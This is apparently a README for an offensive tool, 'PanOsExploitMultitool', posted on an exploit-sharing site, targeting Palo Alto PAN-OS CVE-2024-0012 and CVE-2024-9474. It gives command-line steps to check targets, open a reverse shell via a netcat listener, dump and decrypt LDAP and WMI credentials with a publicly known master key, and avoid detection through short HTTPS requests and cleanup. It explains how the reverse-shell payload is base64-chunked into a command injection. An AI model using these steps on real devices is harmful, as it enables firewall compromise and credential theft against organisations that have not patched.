Share
## https://sploitus.com/exploit?id=5C765575-8904-5B2D-AFA5-EC32BB9879CB
# PanOsExploitMultitool
Exploitation and Post-Exploitation Multitool for Palo Alto PAN-OS Systems affected by vulnerabilities CVE-2024-0012 and CVE-2024-9474


During early exploitation of CVE-2024-0012 and CVE-2024-9474's Remote Code Execution vulnerabilities, I acquired a shell and began identifying configuration files which included strange strings in various password fields. Since these were clearly not common hash formats, my team and I began looking into this and quickly discovered a security advisory on the ThreatLabs website, which mentioned that PAN-OS credentials are (were?) encrypted using a publicly known master key by default. Although this master key is able to be changed in the device's configuration, I have found that the default master key has been used in every instance that I have come across these vulnerabilities. Through designing this tool, my goal is to build an easy way to exploit these vulnerabilities, perform post-exploitation and credential harvesting, and even retrieve plaintext credentials entirely through encrypted HTTPS traffic, without the need for persistent connections which may be detected by network and traffic monitoring solutions.


Currently supports automatically retrieving and decrypting LDAP and WMI credentials, although I have seen rare cases in which secrets strings are encrypted within config files with non-standard XML field names. Currently working on identifying the causes of these unique cases so that I can ensure full support. Please note that this is still in development.



## Installation

Before using, please be sure that all necessary dependencies are installed, using a command such as:
```
pip3 install -r requirements.txt
```


## Check
The "check" command will allow you to check if a remote target is vulnerable to CVE-2024-0012. When targeting a remote host by its IP address, be sure to use the `--no-verify` argument. Example:
```
python3 PanOsExploitMultitool.py check -t {TARGET} --no-verify
```
![image](https://github.com/user-attachments/assets/c98fc2f8-095e-4c3a-b8e9-d7a875b03a93)


## Shell 
The "shell" command will allow you to exploit CVE-2024-0012 and CVE-2024-9474 on a remote target to receive a reverse shell on the remote host. Basically speaking, this command creates a standard bash reverse shell payload, base64 encodes it, chunks the base64 encoded blob into sections small enough to fit inside of CVE-2024-9474's command injection vulnerability, then executes commands to echo each chunk into files in a writable directory (default /var/tmp/). Once these chunks are fully stored, they are amalgamated into a single shell file and then executed on the host, which should connect back to a separate netcat listener (`nc -nvlp {PORT}`). 
Please note that currently the timeout caused by the persistent reverse shell connection prevents the file cleanup from taking place, so you will need to note the random filename printed at the start of the tool's execution and clean it up from the {writable_dir} and /var/appweb/htdocs{remote_dir} locations. I will be fixing this in the next version, but haven't gotten to it yet. Again, don't forget `--no-verify` when necessary.
```
nc -nvlp {PORT}

python3 PanOsExploitMultitool.py shell -t {TARGET} --lhost {LOCAL IP} --lport {LOCAL PORT} --no-verify
```
![image](https://github.com/user-attachments/assets/46de746a-0eed-49cf-99b6-9220b71775af)
![image](https://github.com/user-attachments/assets/bb1e29ff-db1d-4758-afef-83470a6fe03d)



## Dump
This was my primary goal for this project, and the main reason I wanted to build out this tool. Since most writeups and tooling related to these vulnerabilities have been related to Remote Code Execution, I have not found many instances of people detailing useful post-exploitation steps beyond that point. With the dump command, you can not only retrieve and decrypt credentials remotely, but you can do it entirely through a small number of encrypted (HTTPS) web requests without the need for any persistent connections. Since PAN-OS appliances are significantly less likely to have any kind of EDR/MDR/IDR/XDR/?DR solutions on them, this is particularly effective in red team operations.

The dump command follows a similar chunking and executing method to the shell command but, rather than initiating a reverse shell, it retrieves encrypted credentials from the device's configuration files (located in /opt/pancfg/mgmt/saved-configs/) and then automatically decrypts the identified passwords using the public known master key. The dump command will also clean up any created files at the end of decryption, unless you include the `--no-cleanup` argument. As always, don't forget `--no-verify` when necessary.
```
python3 PanOsExploitMultitool.py dump -t {TARGET} --no-verify
```
![image](https://github.com/user-attachments/assets/149a1523-87e2-45d9-82bd-892991ce209a)



Additionally, I have added an optional `--full-running-config` argument, which can be used to dump a retrieve the entire XML contents of the current running config file and save it to a local file. While I do recommend checking beyond this, as I have seen several instances in which previous/other config files contained unique encrypted credentials, this can be a good way to check for any additional credentials which may not have been automatically picked up and decrypted. Additionally, you can perform local processing of any local XML config files using the Local command, which is detailed below.
```
python3 PanOsExploitMultitool.py dump -t {TARGET} --no-verify --full-running-config
```
![image](https://github.com/user-attachments/assets/d9471727-8983-4242-b03d-78dc5f35452d)



## Local
The local command is very basic, and it's use-case is basically only for when you retrieve a full XML config file (such as with the dump command's `--full-running-config` argument), or have already gotten a shell on the PAN-OS device and copied or printed the contents of XML config files from the device (located in /opt/pancfg/mgmt/saved-configs/). It will perform the same logic and automatic decryption of credentials, but from a supplied local file.
```
python3 PanOsExploitMultitool.py local -f {FILE}
```
![image](https://github.com/user-attachments/assets/8001efd5-30f0-4e91-997f-48622f6106db)



## Decrypt
Finally, the decrypt command will allow you decrypt raw strings using the public master key. This is useful in unique scenarios, such as when encrypted credential strings are identified in a past configuration file, but there are no usernames immediately prior. It is also useful currently, as I have not added support for WMI credentials just yet (it will be coming extremely soon, as soon as I can reconfigure my testing VM). These strings can be entered directly into the terminal, and can be accepted in the full "-AQ..........==" format, or just the final base64 encoded blob at the end.
```
python3 PanOsExploitMultitool.py decrypt
```
![image](https://github.com/user-attachments/assets/537d426b-66c0-4157-af6a-ecb85014cfce)



## References
Please see the writeups, modules, and advisories below that were used in the research and development of this project.

"Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474", WatchTowr Labs: https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/

"panos_management_unauth_rce.rb", Stephen Fewer @ Rapid7: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/panos_management_unauth_rce.rb

"Advisory - PAN-OS - AES256-CBC & SHA1", Threatlabs: https://threatlabs.eu/advisories/TL23-PA-SSTWMX/